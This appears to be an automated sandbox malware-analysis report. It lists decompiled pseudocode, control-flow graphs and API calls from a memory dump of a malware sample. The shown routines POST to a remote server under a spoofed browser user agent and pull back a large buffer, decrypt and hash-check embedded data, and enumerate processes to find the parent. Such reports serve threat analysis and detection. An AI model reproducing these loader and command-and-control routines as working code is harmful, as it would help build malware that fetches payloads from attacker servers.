                                                                                                                                                                                                                                                    0x00ec1c4c
                                                                                                                                                                                                                                                    0x00ec1c55
                                                                                                                                                                                                                                                    0x00ec1c5b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1a30

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 00EC1902
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 00EC191D
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC1956
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,*/*,00200300,00000000), ref: 00EC1994
                                                                                                                                                                                                                                                    • wnsprintfA.SHLWAPI ref: 00EC19C2
                                                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 00EC19DD
                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 00EC1A16
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC1A6D
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00EC1A99
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 00EC1B07
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 00EC1B57
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 00EC1BBF
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00EC1C3D
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EC1C75
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EC1C82
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EC1C8F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                    • String ID: */*$0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                    • API String ID: 880997049-2033563659
                                                                                                                                                                                                                                                    • Opcode ID: 49fb9888fdfc6bceed01c9b5b992cabdaa7ebdafbe7b836dfa1e6c0aa7b7db73
                                                                                                                                                                                                                                                    • Instruction ID: b17ab65f4874f49af553ee84fd21b5ca829d1e90de0457aeca4449a73fb5e90c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49fb9888fdfc6bceed01c9b5b992cabdaa7ebdafbe7b836dfa1e6c0aa7b7db73
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BC159B0D442289FEB24CF50CD49FE9B7B5EB88304F1481D8E50DA6281DBBA6E95CF50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 498 ec47f0-ec4801 499 ec4aab-ec4ab1 498->499 500 ec4807-ec480e 498->500 500->499 501 ec4814-ec4832 CryptAcquireContextA 500->501 502 ec4834-ec483f GetLastError 501->502 503 ec4856-ec485a 501->503 502->503 504 ec4841-ec4850 CryptAcquireContextA 502->504 503->499 505 ec4860-ec489d 503->505 504->503 507 ec4a9f-ec4aa5 CryptReleaseContext 505->507 508 ec48a3-ec48f3 call ec7b70 CryptCreateHash 505->508 507->499 511 ec48f9-ec4913 CryptHashData 508->511 512 ec4a90-ec4a96 508->512 515 ec4919-ec4944 CryptDeriveKey 511->515 516 ec4a83-ec4a8a CryptDestroyHash 511->516 513 ec4a98 512->513 514 ec4a9a 512->514 513->507 514->507 515->516 517 ec494a-ec498f CryptDecrypt CryptDestroyKey 515->517 516->512 517->516 518 ec4995-ec49b1 CryptCreateHash 517->518 518->516 519 ec49b7-ec49d4 CryptHashData 518->519 520 ec49da-ec4a0f CryptGetHashParam 519->520 521 ec4a76-ec4a7d CryptDestroyHash 519->521 520->521 522 ec4a11-ec4a3c CryptGetHashParam 520->522 521->516 522->521 523 ec4a3e-ec4a58 call ec7c70 522->523 523->521 526 ec4a5a-ec4a72 call ec7b70 523->526 526->521
                                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                                    			E00EC47F0(intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                                                                                                                    				signed int _v5;
                                                                                                                                                                                                                                                    				long* _v12;
                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                    				char _v764;
                                                                                                                                                                                                                                                    				char _v780;
                                                                                                                                                                                                                                                    				intOrPtr _v784;
                                                                                                                                                                                                                                                    				char _v788;
                                                                                                                                                                                                                                                    				int _v792;
                                                                                                                                                                                                                                                    				int _v796;
                                                                                                                                                                                                                                                    				intOrPtr _v800;
                                                                                                                                                                                                                                                    				long* _v804;
                                                                                                                                                                                                                                                    				int _v808;
                                                                                                                                                                                                                                                    				int _v812;
                                                                                                                                                                                                                                                    				char _v816;
                                                                                                                                                                                                                                                    				int _v820;
                                                                                                                                                                                                                                                    				char _v824;
                                                                                                                                                                                                                                                    				char _v828;
                                                                                                                                                                                                                                                    				char _v844;
                                                                                                                                                                                                                                                    				int _t61;
                                                                                                                                                                                                                                                    				char* _t67;
                                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                                    				int _t69;
                                                                                                                                                                                                                                                    				char* _t73;
                                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                                                                    				signed char _t78;
                                                                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 <= 0x300) {
                                                                                                                                                                                                                                                    					L25:
                                                                                                                                                                                                                                                    					return _v5;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					_t61 = CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                    					if(_t61 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                                                                                    						CryptAcquireContextA( &_v12, 0, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_v788 = 0x10;
                                                                                                                                                                                                                                                    						_v784 = 0x10;
                                                                                                                                                                                                                                                    						_v792 = 0;
                                                                                                                                                                                                                                                    						while(_v792 < _a8 - 0x2ff) {
                                                                                                                                                                                                                                                    							E00EC7B70( &_v780, _a4 + _v792, 0x300);
                                                                                                                                                                                                                                                    							_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                    							_t67 =  &_v780;
                                                                                                                                                                                                                                                    							_v800 = _t67;
                                                                                                                                                                                                                                                    							_v796 = 0;
                                                                                                                                                                                                                                                    							__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v796); // executed
                                                                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                                    								if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    									_v792 = _v792 + 1;
                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t68 = _v800;
                                                                                                                                                                                                                                                    							__imp__CryptHashData(_v796, _t68, 0x10, 0);
                                                                                                                                                                                                                                                    							if(_t68 != 0) {
                                                                                                                                                                                                                                                    								_v804 = 0;
                                                                                                                                                                                                                                                    								_t69 = _v796;
                                                                                                                                                                                                                                                    								__imp__CryptDeriveKey(_v12, 0x6801, _t69, 1,  &_v804); // executed
                                                                                                                                                                                                                                                    								if(_t69 != 0) {
                                                                                                                                                                                                                                                    									_v812 = 0x2f0;
                                                                                                                                                                                                                                                    									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
                                                                                                                                                                                                                                                    									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                    									if(_v808 != 0) {
                                                                                                                                                                                                                                                    										_t73 =  &_v816;
                                                                                                                                                                                                                                                    										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
                                                                                                                                                                                                                                                    										if(_t73 != 0) {
                                                                                                                                                                                                                                                    											_t74 = _v816;
                                                                                                                                                                                                                                                    											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                    											if(_t74 != 0) {
                                                                                                                                                                                                                                                    												_v820 = 0;
                                                                                                                                                                                                                                                    												_v824 = 4;
                                                                                                                                                                                                                                                    												_t76 = _v816;
                                                                                                                                                                                                                                                    												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                    												if(_t76 != 0) {
                                                                                                                                                                                                                                                    													_v828 = 0x10;
                                                                                                                                                                                                                                                    													_t77 = _v816;
                                                                                                                                                                                                                                                    													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                    													if(_t77 != 0) {
                                                                                                                                                                                                                                                    														_t78 = E00EC7C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                    														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                    														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    															_t52 =  &_a12; // 0xec4665
                                                                                                                                                                                                                                                    															E00EC7B70( *_t52,  &_v780, 0x300);
                                                                                                                                                                                                                                                    															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                    															_v5 = 1;
                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L25;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}































                                                                                                                                                                                                                                                    0x00ec47f9
                                                                                                                                                                                                                                                    0x00ec4801
                                                                                                                                                                                                                                                    0x00ec4aab
                                                                                                                                                                                                                                                    0x00ec4ab1
                                                                                                                                                                                                                                                    0x00ec4814
                                                                                                                                                                                                                                                    0x00ec4814
                                                                                                                                                                                                                                                    0x00ec482a
                                                                                                                                                                                                                                                    0x00ec4832
                                                                                                                                                                                                                                                    0x00ec4850
                                                                                                                                                                                                                                                    0x00ec4850
                                                                                                                                                                                                                                                    0x00ec485a
                                                                                                                                                                                                                                                    0x00ec4860
                                                                                                                                                                                                                                                    0x00ec486a
                                                                                                                                                                                                                                                    0x00ec4874
                                                                                                                                                                                                                                                    0x00ec488f
                                                                                                                                                                                                                                                    0x00ec48b9
                                                                                                                                                                                                                                                    0x00ec48be
                                                                                                                                                                                                                                                    0x00ec48c1
                                                                                                                                                                                                                                                    0x00ec48c7
                                                                                                                                                                                                                                                    0x00ec48cd
                                                                                                                                                                                                                                                    0x00ec48eb
                                                                                                                                                                                                                                                    0x00ec48f3
                                                                                                                                                                                                                                                    0x00ec4a90
                                                                                                                                                                                                                                                    0x00ec4a96
                                                                                                                                                                                                                                                    0x00ec4889
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4889
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4a98
                                                                                                                                                                                                                                                    0x00ec48fd
                                                                                                                                                                                                                                                    0x00ec490b
                                                                                                                                                                                                                                                    0x00ec4913
                                                                                                                                                                                                                                                    0x00ec4919
                                                                                                                                                                                                                                                    0x00ec492c
                                                                                                                                                                                                                                                    0x00ec493c
                                                                                                                                                                                                                                                    0x00ec4944
                                                                                                                                                                                                                                                    0x00ec494a
                                                                                                                                                                                                                                                    0x00ec4975
                                                                                                                                                                                                                                                    0x00ec4982
                                                                                                                                                                                                                                                    0x00ec498f
                                                                                                                                                                                                                                                    0x00ec4995
                                                                                                                                                                                                                                                    0x00ec49a9
                                                                                                                                                                                                                                                    0x00ec49b1
                                                                                                                                                                                                                                                    0x00ec49c5
                                                                                                                                                                                                                                                    0x00ec49cc
                                                                                                                                                                                                                                                    0x00ec49d4
                                                                                                                                                                                                                                                    0x00ec49da
                                                                                                                                                                                                                                                    0x00ec49e4
                                                                                                                                                                                                                                                    0x00ec4a00
                                                                                                                                                                                                                                                    0x00ec4a07
                                                                                                                                                                                                                                                    0x00ec4a0f
                                                                                                                                                                                                                                                    0x00ec4a11
                                                                                                                                                                                                                                                    0x00ec4a2d
                                                                                                                                                                                                                                                    0x00ec4a34
                                                                                                                                                                                                                                                    0x00ec4a3c
                                                                                                                                                                                                                                                    0x00ec4a4b
                                                                                                                                                                                                                                                    0x00ec4a50
                                                                                                                                                                                                                                                    0x00ec4a58
                                                                                                                                                                                                                                                    0x00ec4a66
                                                                                                                                                                                                                                                    0x00ec4a6a
                                                                                                                                                                                                                                                    0x00ec4a6f
                                                                                                                                                                                                                                                    0x00ec4a72
                                                                                                                                                                                                                                                    0x00ec4a72
                                                                                                                                                                                                                                                    0x00ec4a58
                                                                                                                                                                                                                                                    0x00ec4a3c
                                                                                                                                                                                                                                                    0x00ec4a0f
                                                                                                                                                                                                                                                    0x00ec4a7d
                                                                                                                                                                                                                                                    0x00ec4a7d
                                                                                                                                                                                                                                                    0x00ec49b1
                                                                                                                                                                                                                                                    0x00ec498f
                                                                                                                                                                                                                                                    0x00ec4944
                                                                                                                                                                                                                                                    0x00ec4a8a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec4a8a
                                                                                                                                                                                                                                                    0x00ec4aa5
                                                                                                                                                                                                                                                    0x00ec4aa5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec485a

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC482A
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00EC4834
                                                                                                                                                                                                                                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC4850
                                                                                                                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00EC48EB
                                                                                                                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 00EC490B
                                                                                                                                                                                                                                                    • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 00EC493C
                                                                                                                                                                                                                                                    • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 00EC496F
                                                                                                                                                                                                                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 00EC4982
                                                                                                                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 00EC49A9
                                                                                                                                                                                                                                                    • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 00EC49CC
                                                                                                                                                                                                                                                    • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 00EC4A07
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0$eF
                                                                                                                                                                                                                                                    • API String ID: 2739279601-870584789
                                                                                                                                                                                                                                                    • Opcode ID: 04bfd37777fc8531018bbffa609197dac67fd5598ec36099607a6e4b4fac7764
                                                                                                                                                                                                                                                    • Instruction ID: 28b26f9a7d3d27823a714c7571eb1b59dfdcd9998905dcb7822ab8f7fbe2c60d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04bfd37777fc8531018bbffa609197dac67fd5598ec36099607a6e4b4fac7764
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67714FB1A40318ABDB25CB51CD55FED77BCAB48704F104198F609BA1C0DBB69B8ACF54
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 587 ec1ca0-ec1cc3 CreateToolhelp32Snapshot 588 ec1cc9-ec1ce8 Process32First 587->588 589 ec1e51-ec1e57 587->589 590 ec1cee-ec1cfa GetCurrentProcessId 588->590 591 ec1e44-ec1e4b CloseHandle 588->591 592 ec1d04-ec1d10 590->592 591->589 593 ec1d20-ec1d35 Process32Next 592->593 594 ec1d12-ec1d1e 592->594 593->592 595 ec1d37-ec1d3e 593->595 594->595 595->591 596 ec1d44-ec1d59 Process32First 595->596 596->591 597 ec1d5f-ec1d6b 596->597 598 ec1e29-ec1e3e Process32Next 597->598 599 ec1d71-ec1d81 lstrlenA 597->599 598->591 598->597 600 ec1e27 599->600 601 ec1d87-ec1db9 lstrcpyA OpenProcess 599->601 600->591 601->600 602 ec1dbb-ec1de3 EnumProcessModules 601->602 603 ec1de5-ec1e00 GetModuleFileNameExA 602->603 604 ec1e02-ec1e11 GetProcessImageFileNameA 602->604 605 ec1e16-ec1e21 FindCloseChangeNotification 603->605 604->605 605->600
                                                                                                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                                                                                                    			E00EC1CA0(CHAR* _a4, char _a8) {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                                                                    				long _v284;
                                                                                                                                                                                                                                                    				intOrPtr _v300;
                                                                                                                                                                                                                                                    				void* _v308;
                                                                                                                                                                                                                                                    				void* _v312;
                                                                                                                                                                                                                                                    				long _v316;
                                                                                                                                                                                                                                                    				long _v320;
                                                                                                                                                                                                                                                    				void* _v324;
                                                                                                                                                                                                                                                    				char _v328;
                                                                                                                                                                                                                                                    				int _v332;
                                                                                                                                                                                                                                                    				void* _t44;
                                                                                                                                                                                                                                                    				int _t47;
                                                                                                                                                                                                                                                    				int _t50;
                                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                    				_v312 = _t44;
                                                                                                                                                                                                                                                    				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                                    					return _v5;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v308 = 0x128;
                                                                                                                                                                                                                                                    				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                    				if(_t47 == 0) {
                                                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                                                    					CloseHandle(_v312);
                                                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                    				_v316 = 0;
                                                                                                                                                                                                                                                    				while(_v300 != _v320) {
                                                                                                                                                                                                                                                    					_t50 = Process32Next(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                    					if(_t50 != 0) {
                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                                    					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                    						while(_v300 != _v316) {
                                                                                                                                                                                                                                                    							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                    							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                    							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                    							if(_v324 != 0) {
                                                                                                                                                                                                                                                    								_v332 = 0;
                                                                                                                                                                                                                                                    								_push( &_v332);
                                                                                                                                                                                                                                                    								_push(4);
                                                                                                                                                                                                                                                    								_push( &_v328);
                                                                                                                                                                                                                                                    								_t61 = _v324;
                                                                                                                                                                                                                                                    								_push(_t61); // executed
                                                                                                                                                                                                                                                    								L00ECB1D4(); // executed
                                                                                                                                                                                                                                                    								if(_t61 == 0) {
                                                                                                                                                                                                                                                    									_t35 =  &_a8; // 0xec575b
                                                                                                                                                                                                                                                    									_push( *_t35);
                                                                                                                                                                                                                                                    									_push(_a4);
                                                                                                                                                                                                                                                    									_push(_v324); // executed
                                                                                                                                                                                                                                                    									L00ECB1C8(); // executed
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_t31 =  &_a8; // 0xec575b
                                                                                                                                                                                                                                                    									_push( *_t31);
                                                                                                                                                                                                                                                    									_push(_a4);
                                                                                                                                                                                                                                                    									_push(_v328);
                                                                                                                                                                                                                                                    									_push(_v324);
                                                                                                                                                                                                                                                    									L00ECB1CE();
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v5 = 1;
                                                                                                                                                                                                                                                    								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v316 = _v284;
                                                                                                                                                                                                                                                    				goto L6;
                                                                                                                                                                                                                                                    			}


















                                                                                                                                                                                                                                                    0x00ec1ca9
                                                                                                                                                                                                                                                    0x00ec1cb1
                                                                                                                                                                                                                                                    0x00ec1cb6
                                                                                                                                                                                                                                                    0x00ec1cc3
                                                                                                                                                                                                                                                    0x00ec1e51
                                                                                                                                                                                                                                                    0x00ec1e57
                                                                                                                                                                                                                                                    0x00ec1e57
                                                                                                                                                                                                                                                    0x00ec1cc9
                                                                                                                                                                                                                                                    0x00ec1ce1
                                                                                                                                                                                                                                                    0x00ec1ce8
                                                                                                                                                                                                                                                    0x00ec1e44
                                                                                                                                                                                                                                                    0x00ec1e4b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1e4b
                                                                                                                                                                                                                                                    0x00ec1cf4
                                                                                                                                                                                                                                                    0x00ec1cfa
                                                                                                                                                                                                                                                    0x00ec1d04
                                                                                                                                                                                                                                                    0x00ec1d2e
                                                                                                                                                                                                                                                    0x00ec1d35
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1d37
                                                                                                                                                                                                                                                    0x00ec1d3e
                                                                                                                                                                                                                                                    0x00ec1d5f
                                                                                                                                                                                                                                                    0x00ec1e3e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1e3e
                                                                                                                                                                                                                                                    0x00ec1d81
                                                                                                                                                                                                                                                    0x00ec1d92
                                                                                                                                                                                                                                                    0x00ec1dac
                                                                                                                                                                                                                                                    0x00ec1db9
                                                                                                                                                                                                                                                    0x00ec1dbb
                                                                                                                                                                                                                                                    0x00ec1dcb
                                                                                                                                                                                                                                                    0x00ec1dcc
                                                                                                                                                                                                                                                    0x00ec1dd4
                                                                                                                                                                                                                                                    0x00ec1dd5
                                                                                                                                                                                                                                                    0x00ec1ddb
                                                                                                                                                                                                                                                    0x00ec1ddc
                                                                                                                                                                                                                                                    0x00ec1de3
                                                                                                                                                                                                                                                    0x00ec1e02
                                                                                                                                                                                                                                                    0x00ec1e05
                                                                                                                                                                                                                                                    0x00ec1e09
                                                                                                                                                                                                                                                    0x00ec1e10
                                                                                                                                                                                                                                                    0x00ec1e11
                                                                                                                                                                                                                                                    0x00ec1de5
                                                                                                                                                                                                                                                    0x00ec1de5
                                                                                                                                                                                                                                                    0x00ec1de8
                                                                                                                                                                                                                                                    0x00ec1dec
                                                                                                                                                                                                                                                    0x00ec1df3
                                                                                                                                                                                                                                                    0x00ec1dfa
                                                                                                                                                                                                                                                    0x00ec1dfb
                                                                                                                                                                                                                                                    0x00ec1dfb
                                                                                                                                                                                                                                                    0x00ec1e16
                                                                                                                                                                                                                                                    0x00ec1e21
                                                                                                                                                                                                                                                    0x00ec1e21
                                                                                                                                                                                                                                                    0x00ec1db9
                                                                                                                                                                                                                                                    0x00ec1e27
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec1d3e
                                                                                                                                                                                                                                                    0x00ec1d18
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EC1CB1
                                                                                                                                                                                                                                                    • Process32First.KERNEL32(000000FF,00000128), ref: 00EC1CE1
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00EC1CEE
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32 ref: 00EC1D2E
                                                                                                                                                                                                                                                    • Process32First.KERNEL32(000000FF,00000128), ref: 00EC1D52
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 00EC1D78
                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(-00000204,?), ref: 00EC1D92
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EC1DA6
                                                                                                                                                                                                                                                    • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 00EC1DDC
                                                                                                                                                                                                                                                    • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,[W,00000000,?,00000004,00000000), ref: 00EC1DFB
                                                                                                                                                                                                                                                    • GetProcessImageFileNameA.PSAPI(00000000,-00000204,[W,00000000,?,00000004,00000000), ref: 00EC1E11
                                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,[W,00000000,?,00000004,00000000), ref: 00EC1E21
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32 ref: 00EC1E37
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00EC1E4B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID: [W
                                                                                                                                                                                                                                                    • API String ID: 384183238-2869482503
                                                                                                                                                                                                                                                    • Opcode ID: e3108bbc3739e205df35c35f5d2bf4f9e256e1fbb2f26447d8cea17088821daa
